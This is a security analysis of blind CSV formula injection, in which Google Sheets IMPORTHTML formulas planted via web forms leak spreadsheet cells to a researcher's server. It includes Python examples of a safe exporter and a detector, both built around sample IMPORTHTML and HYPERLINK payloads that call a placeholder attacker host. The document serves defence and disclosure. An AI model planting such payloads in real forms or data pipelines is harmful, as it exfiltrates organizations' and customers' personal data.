Full Report
Blind XSS is a funny bug: you plant a payload, walk away, and eventually it fires when somebody loads the page. This article describes a similar class of exploit, but using CSVs. CSVs are used everywhere by modern companies: spreadsheets viewed in Excel, downloads produced by automation tools, Salesforce reports, and many other places. If we can poison the pipeline behind a web page, could we do the same for a CSV? Depending on the parser, CSV cells can invoke some powerful functions, so this could be used for a range of attacks depending on the system.

The researchers targeted Google Sheets with CSV data imported into it. The IMPORTHTML function is a natural target because it makes web requests: by concatenating cells from the sheet into the requested URL, they could read part of the sheet's contents from the incoming request. Their listening server logged the host, path, query string, timestamp and user agent of each callback. So where do you send the payload? Initially they submitted it to hundreds of support and contact email addresses, technical support channels and similar inboxes. When that produced nothing, they added it to web forms, and from there they got some hits after 20 days.

The author makes an interesting observation: none of the callbacks fired at ingestion; they came from some later step in the internal pipeline, and whether that was an automated import into Google Sheets or a real human opening the file varied by target. CSV exports from Salesforce, Zendesk and HubSpot were a major source. Automation tools such as Zapier and Workato insert data into Google Sheets live, which gave a fairly quick turnaround. Who were the victims? A large social media platform leaked forwarded emails from a payments-support inbox. A major hotel chain leaked membership application details. Even a bug bounty live hacking event's intake form sent personal details to the researchers' server. All of this was reported to the affected organizations.
Most of them fixed the issue by validating input at the point of ingestion. A unique showcase of what some engineering, creativity and throwing a payload at every possible target can achieve. Great research!
Analysis Summary
# Vulnerability: Blind CSV Injection (Formula Injection) in Data Pipelines
## CVE Details
- **CVE ID:** None assigned (this is a vulnerability class in the victims' data pipelines, not a defect in a single product; the page cites no vendor CVEs)
- **CVSS Score:** Not formally scored; this summary estimates High (roughly 7.5 to 8.2) for the data-exfiltration scenario described
- **CWE:** CWE-1236: Improper Neutralization of Formula Elements in a CSV File
## Affected Systems
- **Products:** Not a defect in any single product. The leaky pipelines in the research pulled data from CRM and helpdesk platforms (Salesforce, Zendesk, HubSpot) or were fed live by automation tools (Zapier, Workato) into Google Sheets.
- **Versions:** Not version-specific; any exporter or pipeline that passes user-supplied text into a CSV or spreadsheet without neutralizing formula characters.
- **Configurations:** Systems where user-provided input (from web forms, support emails, or intake forms) is exported to CSV and subsequently opened in, or imported into, a spreadsheet application such as Google Sheets or Excel.
## Vulnerability Description
This is a "blind" variation of CSV Injection (also known as Formula Injection). The vulnerability occurs when a web application accepts untrusted input and later writes it into a CSV file without neutralizing it. When that CSV is uploaded to or opened by a spreadsheet processor (Google Sheets in this research), the spreadsheet engine interprets cells starting with special characters (`=`, `+`, `-`, `@`, and per OWASP also a leading tab or carriage return) as formulas rather than text. It is "blind" because the attacker never sees the spreadsheet: the payload is submitted, sits in a database, and only fires when some downstream process or person loads the export.
The researchers leveraged Google Sheets' `IMPORTHTML` function. By injecting a formula that concatenates other cells of the sheet into the query string of the URL it fetches, the attacker exfiltrates spreadsheet contents to a server under their control. Because Google Sheets evaluates `IMPORTHTML` on Google's servers, the request reaches the attacker from Google's infrastructure rather than from the victim's network, so the victim's egress logs never record it.
## Exploitation
- **Status:** PoC available; tested successfully against multiple high-profile targets.
- **Complexity:** Low to medium per payload (standard spreadsheet functions), but blind: the attacker needs a listening server, some knowledge of how victims move data into spreadsheets, and patience, since callbacks in this research arrived weeks after submission.
- **Attack Vector:** Network (Submitting malicious payloads via web forms, support tickets, or emails).
## Impact
- **Confidentiality:** High (Internal data, payment support logs, and personal details were exfiltrated).
- **Integrity:** Medium (Ability to manipulate data presentation within the spreadsheet).
- **Availability:** Low (Primary impact is data theft, not service disruption).
## Remediation
### Patches
- **Generic Fix:** Organizations reported fixing the issue by implementing strict input validation and sanitization at the point of ingestion.
- **Specific Fix:** Following the OWASP CSV Injection cheat sheet, neutralize every exported field: prefix any value whose first character is `=`, `+`, `-`, `@`, tab or carriage return with a single quote `'` (which forces the spreadsheet to treat the cell as text), wrap every field in double quotes, and double any embedded double quotes so a value cannot break out of its cell. Prefixing a space instead of a quote is unreliable because many importers trim leading whitespace. Apply this in the exporter, not only in the form handler, so that data that entered through other channels (email, API, imports) is covered too.
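The exporter described in the vulnerability description above, beside its hardened form, as an added example in Python that is not code from the original research or from any of the platforms named on this page. The `IMPORTHTML` payload in the constructed sample rows uses the placeholder host `attacker.invalid`, and `formula_cells` reads the generated CSV back to show which cells a spreadsheet would evaluate as formulas (using the OWASP trigger characters, which is an assumption about the target spreadsheet's behaviour).

```python
import csv
import io

# Leading characters that Google Sheets / Excel treat as the start of a formula
# (OWASP CSV Injection cheat sheet: =, +, -, @, tab, carriage return).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell as a formula rather than text."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value) -> str:
    """Return the cell value with formula interpretation defeated.

    A leading single quote forces text mode in Sheets/Excel. Combined with
    csv.QUOTE_ALL in the writer (every field double-quoted, embedded quotes
    doubled), a value containing "," or a quote cannot break out of its cell.
    """
    text = "" if value is None else str(value)
    if is_formula_like(text):
        return "'" + text
    return text


def export_unsafe(rows, header):
    """Vulnerable exporter: writes user-controlled fields verbatim."""
    buf = io.StringIO()
    w = csv.writer(buf, lineterminator="\n")
    w.writerow(header)
    for r in rows:
        w.writerow([r[h] for h in header])
    return buf.getvalue()


def export_safe(rows, header):
    """Hardened exporter: neutralize each field and quote every field."""
    buf = io.StringIO()
    w = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    w.writerow(header)
    for r in rows:
        w.writerow([neutralize_cell(r[h]) for h in header])
    return buf.getvalue()


def formula_cells(csv_text: str):
    """Parse CSV text back and return (row_index, column_name) for every cell
    a spreadsheet would evaluate as a formula."""
    reader = csv.DictReader(io.StringIO(csv_text))
    hits = []
    for i, row in enumerate(reader):
        for col, val in row.items():
            if val is not None and is_formula_like(val):
                hits.append((i, col))
    return hits


# Constructed sample: two ordinary submissions and one whose "name" field is the
# kind of IMPORTHTML payload the research describes. attacker.invalid is a
# placeholder, not a real server; B1/C1 are the cells the formula would leak.
SAMPLE_ROWS = [
    {"id": 101, "name": "Alice Example", "email": "alice@example.com"},
    {"id": 102, "name": '=IMPORTHTML("https://attacker.invalid/?d="&B1&C1,"table",1)',
     "email": "x@example.com"},
    {"id": 103, "name": "-5 stars, would not buy", "email": "bob@example.com"},
]
HEADER = ["id", "name", "email"]

if __name__ == "__main__":
    unsafe = export_unsafe(SAMPLE_ROWS, HEADER)
    print(unsafe)
    print("formula cells in unsafe export:", formula_cells(unsafe))
    safe = export_safe(SAMPLE_ROWS, HEADER)
    print(safe)
    print("formula cells in safe export:", formula_cells(safe))
```

Note that the third row ("-5 stars, would not buy") is an ordinary customer comment that still trips the trigger rule, which is why neutralization must be a transformation rather than a rejection: blocking such values would break legitimate data. The leading quote is visible to any non-spreadsheet consumer of the CSV, so pipelines that feed both spreadsheets and scripts should apply it at the spreadsheet-bound export only.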
### Workarounds
- Where the spreadsheet software offers it, disable external data features (for example Excel's DDE and external data connection settings). Google Sheets does not expose a per-file switch for `IMPORTHTML` and the other `IMPORT*` functions, so for Sheets-based pipelines neutralization at ingestion or export is the only reliable control.
- Use plain-text viewers to audit CSV data before importing it into analytical tools.
## Detection
- **Indicators of Compromise:** The callback is made by Google's servers, so the victim's own network egress logs will not show it. The observable indicators are formula-prefixed values (`=`, `+`, `-`, `@`, leading tab or carriage return) in stored form submissions, ticket fields and exported CSVs, especially values that embed a URL and reference other cells, and, on the attacker's side, inbound requests from Google infrastructure carrying long or encoded query strings.
- **Detection Methods:** Scan database fields and exported files for formula signatures such as `=IMPORTHTML`, `=IMPORTXML`, or `=HYPERLINK`, including the `+`, `-`, `@` and leading-whitespace variants. Run the scan both at ingestion and as a periodic audit of existing data, because in this research the payloads sat unnoticed for weeks before anything fired.
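The detection logic from the two bullets above, run over a handful of constructed stored form submissions, as an added example in Python that is not part of the original page. The page names `IMPORTHTML`, `IMPORTXML` and `HYPERLINK`; the list below also includes the other Google Sheets `IMPORT*` functions and Excel's `WEBSERVICE` and `DDE`, which is an extension beyond the text. The JSON-lines input and its hosts (`attacker.invalid`) are constructed placeholders.

```python
import json
import re
from collections import Counter

# Spreadsheet functions that reach out to the network or other external resources.
# IMPORTHTML, IMPORTXML and HYPERLINK are the ones the research names; the rest
# are added here (other Google Sheets IMPORT* functions, Excel WEBSERVICE/DDE).
NETWORK_FUNCS = ("IMPORTHTML", "IMPORTXML", "IMPORTDATA", "IMPORTFEED", "IMPORTRANGE",
                 "HYPERLINK", "WEBSERVICE", "DDE")

# A cell is formula-like when its first non-blank character is a trigger character.
# Matching after optional whitespace catches payloads padded with spaces or tabs to
# slip past a naive "starts with =" check.
FORMULA_RE = re.compile(r"^\s*[=+\-@]")
FUNC_RE = re.compile(r"\b(" + "|".join(NETWORK_FUNCS) + r")\s*\(", re.IGNORECASE)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.IGNORECASE)


def classify(value):
    """Return None for benign text, otherwise a dict describing the finding.

    'high' means a formula-like value that calls a network-capable function;
    'low' means formula-like text with no such call (often a legitimate comment
    such as '-5 stars', but still worth neutralizing before export).
    """
    if not isinstance(value, str) or not FORMULA_RE.match(value):
        return None
    funcs = sorted({m.group(1).upper() for m in FUNC_RE.finditer(value)})
    hosts = sorted({m.group(1).lower() for m in HOST_RE.finditer(value)})
    return {"severity": "high" if funcs else "low", "functions": funcs, "hosts": hosts}


def scan_records(jsonl_text):
    """Scan JSON-lines records (one stored form submission per line) and return
    one finding per suspicious field, tagged with its line number and field name."""
    findings = []
    for n, line in enumerate(jsonl_text.splitlines(), 1):
        if not line.strip():
            continue
        rec = json.loads(line)
        for field, val in rec.items():
            hit = classify(val)
            if hit:
                findings.append({"line": n, "field": field, **hit})
    return findings


def hosts_by_frequency(findings):
    """Aggregate the callback hosts seen across findings, most frequent first,
    which is the quickest way to spot one campaign spread over many records."""
    counts = Counter()
    for f in findings:
        counts.update(f["hosts"])
    return counts.most_common()


# Constructed sample of stored submissions; every host is a placeholder.
SAMPLE_JSONL = "\n".join([
    json.dumps({"name": "Alice Example", "subject": "Invoice question"}),
    json.dumps({"name": '=IMPORTHTML("https://attacker.invalid/?d="&A1&B1,"table",1)',
                "subject": "help"}),
    json.dumps({"name": "Bob",
                "subject": ' =hyperlink("http://log.attacker.invalid/x?"&A2,"click")'}),
    json.dumps({"name": "-not a formula really", "subject": "ok"}),
    json.dumps({"name": "Carol", "subject": "Visit https://docs.example.com for details"}),
])

if __name__ == "__main__":
    found = scan_records(SAMPLE_JSONL)
    for f in found:
        print(f)
    print("hosts:", hosts_by_frequency(found))
```

A URL inside an ordinary sentence (the last sample record) is not flagged, because the trigger is the formula prefix, not the presence of a link; conversely a lower-case `hyperlink` after a leading space is still caught. In a real deployment the same `classify` function can run as a pre-insert check and as a batch job over historical rows, since the research showed payloads surviving in stored data for weeks before a downstream export triggered them.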
## References
- OWASP CSV Injection Guide: hxxps[://]cheatsheetseries[.]owasp[.]org/cheatsheets/CSV_Injection_Cheat_Sheet[.]html
- Google Sheets Function Documentation: hxxps[://]support[.]google[.]com/docs/answer/3093339